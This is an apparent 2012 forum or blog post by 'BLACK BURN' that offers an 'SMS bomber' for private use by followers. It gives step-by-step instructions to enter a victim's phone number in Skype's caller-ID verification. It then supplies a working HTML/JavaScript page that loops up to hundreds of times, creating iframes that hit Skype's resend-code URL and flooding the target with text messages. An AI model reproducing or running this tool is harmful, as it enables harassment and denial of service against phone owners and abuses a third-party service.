hellow my private friendz ,this one sms flooder,we can sent unlimited sms on any mobile
we need skype account
go to this url
login in it
then select country
and write phone number
and sent verifiy
then save this html with any name
like BBM-bomber.html
now 1st time sent verfiy code then open this one
and write
between 0 - 999
replace with sms which u want to sent like 100 then bombing
if u have any question please comment here
©2012, copyright BLACK BURN
we need skype account
go to this url
then select country
and write phone number
and sent verifiy
then save this html with any name
like BBM-bomber.html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>BLACK BURN's Bomber | Use in Google Chrome Only</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <script language="JavaScript"> // CREDITS TO BLACK BURN function bombing() //Funtion to Bomb on click Stars here { { for(i=0;i<document.formnew.number2.value;i++) //Setting Loop { myiframe=document.createElement("IFRAME"); myiframe.setAttribute("src", "https://secure.skype.com/account/caller-id/resend-code"); myiframe.style.width = 15+"px"; myiframe.style.height = 15+"px"; document.body.appendChild(myiframe); // Iframe End } // Loop body close } } // Function Body Close </script> </head> <center> <body bgcolor="#999999"> <h1> | BLACK BURN | BD BLACK HAT's SMS BOOTER</h1> <hr><h6> This Booter is for Private Use of BBHH, My Blog Followers and for Some Special friends only.<br> Rememebr If you have access to this Bomber means you worth it and I (BLACK BURN) expect you not to leach or share it in Public. If I found so will remove this Booter from the domain within no time</h6> <hr> <form method="post" name="formnew" id="formnew"> <table align="center"> <font color="#FFFFFF"> <tr> <td> Enter Number of times to Bomb : </td> <td> <input type="text" name="number2" id="number2" title="Dont Exceed 500 in 1 time" value="between 0 - 999"> </td> </tr> <tr> <td colspan="2"> <center> <input type="button" onClick="bombing()" name="bomb" value=" ......::::| START BOOTING |:::::...... " title="Bomb" > </td> </form><br> </td> </tr> </table> </form> <a href="https://www.facebook.com/blackburnmoonlitt" target=blank> JOIN ME ON FACEBOOK </a> </center><font color="#0000FF"><br>BOOTING STATUS: <br></font> </body> </html>
now 1st time sent verfiy code then open this one
and write
between 0 - 999
replace with sms which u want to sent like 100 then bombing
if u have any question please comment here
©2012, copyright BLACK BURN
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